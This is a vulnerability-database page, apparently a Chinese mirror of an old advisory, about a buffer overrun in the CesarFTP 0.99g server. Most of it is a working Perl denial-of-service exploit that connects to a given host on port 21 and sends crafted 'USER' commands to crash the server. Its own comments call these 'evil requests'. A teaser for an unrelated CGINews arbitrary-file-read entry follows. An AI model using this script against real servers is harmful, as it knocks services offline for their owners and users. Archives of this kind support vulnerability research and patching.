CesarFTP 0.99 g – Remote ‘Username’ Buffer Overrun
| 漏洞ID | 1053796 | 漏洞类型 | |
| 发布时间 | 2003-03-30 | 更新时间 | 2003-03-30 |
CVE编号
|
N/A |
CNNVD-ID
|
N/A |
| 漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7946/info
A buffer overrun vulnerability has been reported for CesarFTP. The problem is said to occur when multiple 'USER' commands are processed within a single session. When the issue is triggered, it may be possible to overwrite sensitive locations in memory. Although unconfirmed, it may be possible to exploit this issue to execute arbitrary code on a target system.
#!/usr/local/bin/perl
# DOS remote exploit for CesarFtp 0.99g
#It will try to crash CesarFtp Server remotely:)
use Socket;
$ARGC=@ARGV;
if ($ARGC !=1) {
print "Usage: $0 <host>n";
exit;
}
$string="x" x $length;
my($remote,$port,$iaddr,$paddr,$proto,$line);
$remote=$ARGV[0];
$port = "21";
$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";
$login1="user /f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/
f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/
f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/
f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/
f00/n";
#---------------------------------------------------
print "Sending evil request 1...n";
print ($login1);
send(SOCK,$login1, 0) or die "Cannot send query: $!";
$login1="user !@#$%^&*()_n";
print "Sending evil request 2...n";
print ($login1);
send(SOCK,$login1, 0) or die "Cannot send query: $!";
print "Now if you are lucky the server will crash:)n"
#End
CGINews读取任意文件漏洞 漏洞ID 1203171 漏洞类型 未知 发布时间 2002-12-31 更新时间 2002-12-31 CVE编号 CVE-2002-1736 CNNVD-ID CNNVD-200212-862 漏洞平台 N/A CVSS评分…
正文完
CVE编号
CNNVD-ID